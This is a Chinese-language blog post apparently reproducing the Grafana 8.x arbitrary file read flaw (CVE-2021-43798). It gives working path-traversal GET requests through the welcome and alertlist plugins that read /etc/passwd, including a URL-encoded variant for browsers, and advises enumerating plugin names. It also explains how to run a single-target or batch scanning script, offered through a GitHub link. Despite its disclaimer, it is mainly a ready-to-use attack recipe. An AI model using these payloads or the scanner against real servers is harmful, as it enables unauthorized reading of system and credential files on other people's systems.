Grafana 任意文件读取漏洞复现(CVE-2021-43798)

此文章仅用于学习以及企业自检,请不要用于违法用途。

Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。

通过默认存在的插件来拼接文件路径构造请求进行文件读取

漏洞状态:

该漏洞暂无补丁,伪0day状态

受影响版本:

Grafana 8.x 系列

验证poc:

构造get请求

/public/plugins/welcome/../../../../../../../../../etc/passwd
/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd
第一条适合在burp里面使用,但是直接在浏览器访问会被过滤掉,第二条适用于在浏览器里直接访问,二者没有什么区别,alertlist与welcome为两个插件,基本上这两个就够用了,如果对方没有安装这俩插件那么可以将这个关键词进行枚举即可

复现过程:

Grafana 任意文件读取漏洞复现(CVE-2021-43798)_第1张图片
Grafana 任意文件读取漏洞复现(CVE-2021-43798)_第2张图片

使用脚本检测-支持单独检测与批量检测

python Grafana.py -u http://ip:port 注意不要在端口后加 “/”

Grafana 任意文件读取漏洞复现(CVE-2021-43798)_第3张图片
批量检测:

python Grafana.py -r 12.txt

文件名字随便取

Grafana 任意文件读取漏洞复现(CVE-2021-43798)_第4张图片
每个地址换行即可,不需要进行符号来区分

执行结束后会返回存在问题的url,输出至当前目录下的Grafana.txt文件内,不需要手动建立,会自动添加

Grafana 任意文件读取漏洞复现(CVE-2021-43798)_第5张图片
存在漏洞的url保存结果如下
Grafana 任意文件读取漏洞复现(CVE-2021-43798)_第6张图片
脚本获取方式可公众号回复
say_ohno!

我不懂安全

CVE-2021-43798脚本

或前往github下载

https://github.com/Ilovewomen/Grafana_CVE

你可能感兴趣的:(web安全评估,安全,web安全)